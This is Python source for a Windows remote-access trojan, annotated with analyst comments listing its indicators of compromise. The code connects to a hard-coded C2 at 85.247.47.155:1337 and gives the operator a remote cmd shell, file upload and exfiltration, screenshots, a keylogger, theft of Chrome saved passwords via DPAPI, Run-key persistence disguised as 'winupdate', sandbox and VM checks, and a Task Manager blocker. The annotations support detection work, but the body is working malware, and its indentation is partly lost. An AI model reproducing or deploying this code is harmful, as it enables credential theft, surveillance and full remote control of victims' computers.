  1. import socket, os, sys, platform, time, ctypes, subprocess, webbrowser, sqlite3, pyscreeze, threading, pynput.keyboard, wmi
  2. import win32api, winerror, win32event, win32crypt
  3. from shutil import copyfile
  4. from winreg import *
  5.  
# --- Analyst note: this paste is a Windows reverse-connect remote-access tool.
# Indicators visible in this file: C2 endpoint 85.247.47.155:1337, mutex name
# "PA_mutex_xp4", HKCU Run value "winupdate", and %TEMP%\m.vbs / d.vbs / s.png. ---
strHost = "85.247.47.155" # hard-coded C2 address (network IoC)
# strHost = socket.gethostbyname("")
intPort = 1337 # C2 port (network IoC)

strPath = os.path.realpath(sys.argv[0]) # get file path (own location, used by startup() to self-copy)
TMP = os.environ["TEMP"] # get temp path (all dropped artefacts land here)
APPDATA = os.environ["APPDATA"]
intBuff = 1024 # size passed to every recv() below, i.e. the maximum length of one C2 command
  14.  
  15.  
# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4") # named mutex "PA_mutex_xp4" is a host IoC (visible in handle listings)
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
sys.exit(0) # a second copy finds the mutex already held and exits immediately
  21.  
  22.  
def detectSandboxie():
# Sandbox probe: returns " (Sandboxie) " if SbieDll.dll can be loaded into this process.
# The bare except returns "" on any failure, so the tag is only a weak hint for the operator.
try:
libHandle = ctypes.windll.LoadLibrary("SbieDll.dll")

return " (Sandboxie) "
except: return ""
  29.  
  30.  
def detectVM():
# VM probe via WMI: tags the beacon when any Win32_DiskDrive caption contains
# "vbox" or "virtual". Only the disk caption is inspected.
objWMI = wmi.WMI()
for objDiskDrive in objWMI.query("Select * from Win32_DiskDrive"):
if "vbox" in objDiskDrive.Caption.lower() or "virtual" in objDiskDrive.Caption.lower():
return " (Virtual Machine) "
return ""
  37.  
  38.  
def server_connect():
# Establishes the C2 session. Blocks until the hard-coded host/port accepts a plain
# TCP connection, then sends one cleartext beacon:
#   <hostname>`,<OS> <release>[ (Sandboxie) ][ (Virtual Machine) ]`,<username>
# The backtick-comma separator is a usable network signature.
global objSocket
while True: # infinite loop until socket can connect
try:
objSocket = socket.socket()
objSocket.connect((strHost, intPort))
except socket.error:
time.sleep(3600) # retry once per hour (the paste's own comment said 5 seconds; the value is 3600)
else: break

strUserInfo = socket.gethostname() + "`," + platform.system() + " " + platform.release() + detectSandboxie() + detectVM() + \
"`," + os.environ["USERNAME"]
send(str.encode(strUserInfo)) # send() is the module-level lambda defined below; it exists by the time this is first called
  52.  
# function to return decoded utf-8
decode_utf8 = lambda data: data.decode("utf-8")

# function to receive data. The original comment said "decrypt": there is no crypto
# here, recv() is a raw socket read, so all C2 traffic is cleartext and inspectable on the wire.
recv = lambda buffer: objSocket.recv(buffer)

# function to send data (likewise unencrypted)
send = lambda data: objSocket.send(data)
  61.  
server_connect() # connects and beacons at import time; blocks forever while the C2 is unreachable
  63.  
def OnKeyboardEvent(event):
# Keylogger callback (pynput on_press). Appends a readable form of each key to the
# module-global strKeyLogs buffer, which keylogger("dump") later sends to the C2.
# `Key` is the pynput.keyboard.Key alias assigned at module level after this def.
global strKeyLogs

try: # check to see if variable is defined
strKeyLogs
except NameError:
strKeyLogs = ""

if event == Key.backspace:
strKeyLogs += " [Bck] "
elif event == Key.tab:
strKeyLogs += " [Tab] "
elif event == Key.enter:
strKeyLogs += "\n"
elif event == Key.space:
strKeyLogs += " "
elif type(event) == Key: # if the character is some other type of special key
strKeyLogs += " [" + str(event)[4:] + "] " # str(Key.x) is "Key.x"; [4:] drops the "Key." prefix
else:
strKeyLogs += str(event)[1:len(str(event)) - 1] # remove quotes around character
  84.  
  85.  
KeyListener = pynput.keyboard.Listener(on_press=OnKeyboardEvent) # created here, only started by the "keystart" command
Key = pynput.keyboard.Key
  88.  
  89.  
def recvall(buffer): # function to receive large amounts of data
# Reads from the C2 socket until `buffer` bytes have arrived (the operator sends the
# byte count first). Used by upload() for incoming file contents.
bytData = b""
while True:
bytPart = recv(buffer)
if len(bytPart) == buffer:
return bytPart
bytData += bytPart
if len(bytData) == buffer:
return bytData
  99.  
  100.  
  101. # vbs message box
def MessageBox(message):
# Shows an operator-supplied message box by writing %TEMP%\m.vbs and running it with
# cscript. Host IoCs: m.vbs in %TEMP% and cscript.exe spawned from a Python process.
objVBS = open(TMP + "/m.vbs", "w")
objVBS.write("Msgbox \"" + message + "\", vbOKOnly+vbInformation+vbSystemModal, \"Message\"")
objVBS.close()
subprocess.Popen(["cscript", TMP + "/m.vbs"], shell=True)
  107.  
  108.  
def startup():
# Persistence: copies this script to %APPDATA%\<own file name> and registers it under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run as value "winupdate".
# Detection: a Run value named "winupdate" whose data points into %APPDATA%.
# Reports "success" or a failure string back to the C2.
try:
strAppPath = APPDATA + "\\" + os.path.basename(strPath)
copyfile(strPath, strAppPath)

objRegKey = OpenKey(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_ALL_ACCESS)
SetValueEx(objRegKey, "winupdate", 0, REG_SZ, strAppPath); CloseKey(objRegKey)
except WindowsError:
send(str.encode("Unable to add to startup!"))
else:
send(str.encode("success"))
  120.  
  121.  
def screenshot():
# Captures the screen to %TEMP%\s.png and streams the raw PNG bytes to the C2 after a
# short text header. The file is left on disk (forensic artefact).
pyscreeze.screenshot(TMP + "/s.png")

# send screenshot information to server
send(str.encode("Receiving Screenshot" + "\n" + "File size: " + str(os.path.getsize(TMP + "/s.png"))
+ " bytes" + "\n" + "Please wait..."))
objPic = open(TMP + "/s.png", "rb") # send file contents and close the file
time.sleep(1) # crude separation between the text header and the binary payload
send(objPic.read())
objPic.close()
  132.  
  133.  
def file_browser():
# Remote directory listing: sends the drive letters, then reads a path from the C2
# and returns the names in that directory (length first, then the listing).
arrRawDrives = win32api.GetLogicalDriveStrings() # get list of drives
arrRawDrives = arrRawDrives.split('\000')[:-1] # NUL-separated; the trailing empty element is dropped

strDrives = ""
for drive in arrRawDrives: # get proper view and place array into string
strDrives += drive.replace("\\", "") + "\n"
send(str.encode(strDrives))

strDir = decode_utf8(recv(intBuff)) # path chosen by the operator

if os.path.isdir(strDir):
arrFiles = os.listdir(strDir)

strFiles = ""
for file in arrFiles:
strFiles += (file + "\n")

send(str.encode(str(len(strFiles)))) # send buffer size
time.sleep(0.1)
send(str.encode(strFiles))

else: # if the user entered an invalid directory
send(str.encode("Invalid Directory!"))
return
  159.  
  160.  
def upload(data):
# Handles "send<size>": receives <size> bytes from the C2 followed by a destination
# path, and writes the bytes there. This is an arbitrary file write on the host; the
# bare except turns any failure (permissions, bad path) into a one-line error reply.
intBuffer = int(data)
file_data = recvall(intBuffer)
strOutputFile = decode_utf8(recv(intBuff))

try:
objFile = open(strOutputFile, "wb")
objFile.write(file_data)
objFile.close()
send(str.encode("Done!!!"))
except:
send(str.encode("Path is protected/invalid!"))
  173.  
  174.  
def receive(data):
# Handles "recv<path>": exfiltrates the named file to the C2, raw bytes after a short
# text header. Any file readable by the current user is in scope.
if not os.path.isfile(data):
send(str.encode("Target file not found!"))
return

send(str.encode("File size: " + str(os.path.getsize(data))
+ " bytes" + "\n" + "Please wait..."))
objFile = open(data, "rb") # send file contents and close the file
time.sleep(1)
send(objFile.read())
objFile.close()
  186.  
  187.  
def lock():
# Locks the interactive session via user32!LockWorkStation.
ctypes.windll.user32.LockWorkStation() # lock pc
  190.  
  191.  
def shutdown(shutdowntype):
# Schedules a forced shutdown ("-s") or restart ("-r") in 30 seconds via shutdown.exe,
# then drops the C2 connection and exits. Visible as shutdown.exe spawned from this process.
command = "shutdown {0} -f -t 30".format(shutdowntype)
subprocess.Popen(command.split(), shell=True)
objSocket.close() # close connection and exit
sys.exit(0)
  197.  
  198.  
def command_shell():
# Interactive remote shell: each line from the C2 is run through cmd.exe (shell=True)
# and stdout+stderr are returned, length-prefixed. "cd"/"chdir" are emulated so the
# working directory persists between commands; "goback" restores the original
# directory and returns to the dispatcher. Detection: cmd.exe children of this
# process, one per command.
strCurrentDir = str(os.getcwd())

send(str.encode(strCurrentDir))

while True:
strData = decode_utf8(recv(intBuff))

if strData == "goback":
os.chdir(strCurrentDir) # change directory back to original
break

elif strData[:2].lower() == "cd" or strData[:5].lower() == "chdir":
objCommand = subprocess.Popen(strData + " & cd", stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) # " & cd" makes cmd print the resulting directory
if (objCommand.stderr.read()).decode("utf-8") == "": # if there is no error
strOutput = (objCommand.stdout.read()).decode("utf-8").splitlines()[0] # decode and remove new line
os.chdir(strOutput) # change directory

bytData = str.encode("\n" + str(os.getcwd()) + ">") # output to send the server

elif len(strData) > 0:
objCommand = subprocess.Popen(strData, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
strOutput = (objCommand.stdout.read() + objCommand.stderr.read()).decode("utf-8", errors="replace") # since cmd uses bytes, decode it

bytData = str.encode(strOutput + "\n" + str(os.getcwd()) + ">")
else:
bytData = str.encode("Error!!!")

strBuffer = str(len(bytData))
send(str.encode(strBuffer)) # send buffer size
time.sleep(0.1)
send(bytData) # send output
  231.  
  232.  
def vbs_block_process(process, popup, message, title, timeout, type):
# Writes %TEMP%\d.vbs and runs it under cscript. The script subscribes to WMI
# __InstanceCreationEvent for Win32_Process and terminates each new process whose name
# equals `process`, optionally showing a popup. Because it runs in its own cscript.exe
# it outlives this client; disable_taskmgr() stops it by killing cscript.exe.
# Host IoCs: d.vbs in %TEMP%, a long-lived cscript.exe, and the WMI notification
# query text inside the script. (`type` shadows the builtin name.)
# VBScript to block process, this allows the script to disconnect from the original python process, check github rep for source

strVBSCode = "On Error Resume Next" + "\n" + \
"Set objWshShl = WScript.CreateObject(\"WScript.Shell\")" + "\n" + \
"Set objWMIService = GetObject(\"winmgmts:\" & \"{impersonationLevel=impersonate}!//./root/cimv2\")" + "\n" + \
"Set colMonitoredProcesses = objWMIService.ExecNotificationQuery(\"select * " \
"from __instancecreationevent \" & \" within 1 where TargetInstance isa 'Win32_Process'\")" + "\n" + \
"Do" + "\n" + "Set objLatestProcess = colMonitoredProcesses.NextEvent" + "\n" + \
"If LCase(objLatestProcess.TargetInstance.Name) = \"" + process + "\" Then" + "\n" + \
"objLatestProcess.TargetInstance.Terminate" + "\n"
if popup == "True": # if showing a message
strVBSCode += "objWshShl.Popup \"" + message + "\"," + timeout + ", \"" + title + "\"," + type + "\n"

strVBSCode += "End If" + "\n" + "Loop"

objVBSFile = open(TMP + "/d.vbs", "w") # write the code and close the file
objVBSFile.write(strVBSCode); objVBSFile.close()

subprocess.Popen(["cscript", TMP + "/d.vbs"], shell=True) # run the script
  253.  
  254.  
def disable_taskmgr():
# Toggles the Task Manager blocker using the module-global string blnDisabled (the
# dispatcher sets it to "True" before the first call). "True": start the d.vbs blocker
# for taskmgr.exe with a fake "disabled by your administrator" popup. "False": taskkill
# every cscript.exe, which also ends any other cscript job on the host.
global blnDisabled
if blnDisabled == "False": # if task manager is already disabled, enable it
send(str.encode("Enabling ..."))

subprocess.Popen(["taskkill", "/f", "/im", "cscript.exe"], shell=True)

blnDisabled = "True"
else:
send(str.encode("Disabling ..."))

vbs_block_process("taskmgr.exe", "True", "Task Manager has been disabled by your administrator",
"Task Manager", "3", "16")
blnDisabled = "False"
  269.  
  270.  
def chrpass(): # legal purposes only!
# Credential theft: opens Chrome's "Login Data" SQLite store in place, reads
# action_url/username_value/password_value, decrypts each password with DPAPI
# (CryptUnprotectData) as the current user and sends the list to the C2.
# If the query fails (the code assumes Chrome holding the DB) it replies "error" and
# kills chrome.exe if the operator asks. Detection: a non-Chrome process opening
# Login Data; "taskkill /f /im chrome.exe" launched from a script.
# The storage format assumed here is the one from the paste's date (2019).
strPath = APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data" # local name shadows the module-level strPath

if not os.path.isfile(APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"):
send(str.encode("noexist"))
return

conn = sqlite3.connect(strPath) # connect to database
objCursor = conn.cursor()

try:
objCursor.execute("Select action_url, username_value, password_value FROM logins") # look for credentials
except: # if the chrome is open
send(str.encode("error"))
strServerResponse = decode_utf8(recv(intBuff))

if strServerResponse == "close": # if the user wants to close the browser
subprocess.Popen(["taskkill", "/f", "/im", "chrome.exe"], shell=True)
return

strResults = "Chrome Saved Passwords:" + "\n"

for result in objCursor.fetchall(): # get data as raw text from sql db
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
strResults += "Site: " + result[0] + "\n" + "Username: " + result[1] + "\n" + "Password: " \
+ decode_utf8(password)

strBuffer = str(len(strResults))
send(str.encode(strBuffer)) # send buffer
time.sleep(0.2)
send(str.encode(strResults))
  303.  
  304.  
def keylogger(option):
# Keylogger control. "start": start the pynput listener. "stop": stop it and re-run
# Thread.__init__ on the same object so it can be started again. "dump": send the
# buffered keystrokes (length-prefixed) and clear the buffer. Replies to the C2 are
# "success", "error" or "error2" (nothing buffered). Detection opportunity: whatever
# keyboard hook pynput's Listener installs on Windows (not visible in this file).
global strKeyLogs

if option == "start":
if not KeyListener.running:
KeyListener.start()
send(str.encode("success"))
else:
send(str.encode("error"))

elif option == "stop":
if KeyListener.running:
KeyListener.stop()
threading.Thread.__init__(KeyListener) # re-initialise the thread
strKeyLogs = ""
send(str.encode("success"))
else:
send(str.encode("error"))

elif option == "dump":
if not KeyListener.running:
send(str.encode("error"))
else:
if strKeyLogs == "":
send(str.encode("error2"))
else:
time.sleep(0.2)
send(str.encode(str(len(strKeyLogs)))) # send buffer size
time.sleep(0.2)
send(str.encode(strKeyLogs)) # send logs

strKeyLogs = "" # clear logs
  337.  
  338.  
def run_command(command):
# Handles "runcmd<command>": one-shot execution through cmd.exe (shell=True); stdout
# and stderr are concatenated and returned length-prefixed. Unlike command_shell()
# it does not track the working directory.
strLogOutput = "\n"

if len(command) > 0:
objCommand = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
strLogOutput += (objCommand.stdout.read() + objCommand.stderr.read()).decode("utf-8", errors="ignore")
else:
strLogOutput += "Error!!!"

bytData = str.encode(strLogOutput)

strBuffer = str(len(bytData))
send(str.encode(strBuffer)) # send buffer size
time.sleep(0.1)
send(bytData) # send output
  354.  
  355.  
# Main C2 dispatch loop: each command is one recv() of up to intBuff bytes, matched
# on an exact string or a fixed prefix. Any socket.error tears the connection down and
# re-enters server_connect(), which blocks and re-beacons, so the client reconnects
# indefinitely. Command vocabulary (useful when writing network signatures):
# exit, msg<text>, site<url>, startup, screen, filebrowser, send<size>, recv<path>,
# lock, shutdown, restart, test, cmd, chrpass, keystart, keystop, keydump,
# runcmd<command>, dtaskmgr.
while True:
try:
while True:
strData = recv(intBuff)
strData = decode_utf8(strData)

if strData == "exit":
objSocket.close()
sys.exit(0)
elif strData[:3] == "msg":
MessageBox(strData[3:])
elif strData[:4] == "site":
webbrowser.get().open(strData[4:]) # opens the operator's URL in the default browser
elif strData == "startup":
startup()
elif strData == "screen":
screenshot()
elif strData == "filebrowser":
file_browser()
elif strData[:4] == "send":
upload(strData[4:])
elif strData[:4] == "recv":
receive(strData[4:])
elif strData == "lock":
lock()
elif strData == "shutdown":
shutdown("-s")
elif strData == "restart":
shutdown("-r")
elif strData == "test":
continue # keep-alive: no reply is sent
elif strData == "cmd":
command_shell()
elif strData == "chrpass":
chrpass()
elif strData == "keystart":
keylogger("start")
elif strData == "keystop":
keylogger("stop")
elif strData == "keydump":
keylogger("dump")
elif strData[:6] == "runcmd":
run_command(strData[6:])
elif strData == "dtaskmgr":
if not "blnDisabled" in globals(): # if the variable doesnt exist yet
blnDisabled = "True" # module scope, so this is the global disable_taskmgr() toggles
disable_taskmgr()
except socket.error: # if the server closes without warning
objSocket.close()
del objSocket
server_connect()